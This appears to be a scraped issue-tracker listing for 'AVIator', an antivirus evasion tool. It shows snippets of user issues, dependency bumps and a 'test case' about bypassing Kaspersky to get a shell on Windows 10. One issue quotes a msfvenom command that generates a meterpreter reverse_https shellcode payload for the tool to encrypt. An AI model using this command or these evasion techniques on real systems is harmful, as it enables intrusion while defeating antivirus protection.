AVIator icon indicating copy to clipboard operation
AVIator copied to clipboard

Antivirus evasion project

Results 94 AVIator issues
Sort by recently updated
recently updated
newest added

commit 491cbabf117e056379547a31bd392724f2203b8d Author: Oleh Date: Sat Sep 11 12:37:30 2021 +0300 Add .circleci/config.yml

commit 491cbabf117e056379547a31bd392724f2203b8d Author: Oleh Date: Sat Sep 11 12:37:30 2021 +0300 Add .circleci/config.yml

I followed your instructions but when I am trying to encrypt the csharp shellcode from "msfvenom windows/meterpreter/reverse_https LHOST=X.X.X.X LPORT=XXXX -f csharp" I am getting an error. Error Output: _`System.FormatException: Could...

How do I get a plaintext string converting into the shellcode format for the AES key field?

Please fell free to post your test cases regarding specific AV vendors.

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE) Getting a shell in a windows 10 machine running fully updated kaspersky AV Target Machine: Windows 10 x64 Create...

Hello,I have used it on my computer.And it works well. However,I want to use this tool on Kali nethunter so l hope it has the command-line interface. If it has...

Bumps [serial_test](https://github.com/palfrey/serial_test) from 0.8.0 to 0.9.0. Release notes Sourced from serial_test's releases. v0.9.0 What's Changed Move rustversion declaration to a dev-dependency by @​complexspaces in palfrey/serial_test#69 Improved "all combinations of features"...

dependencies
rust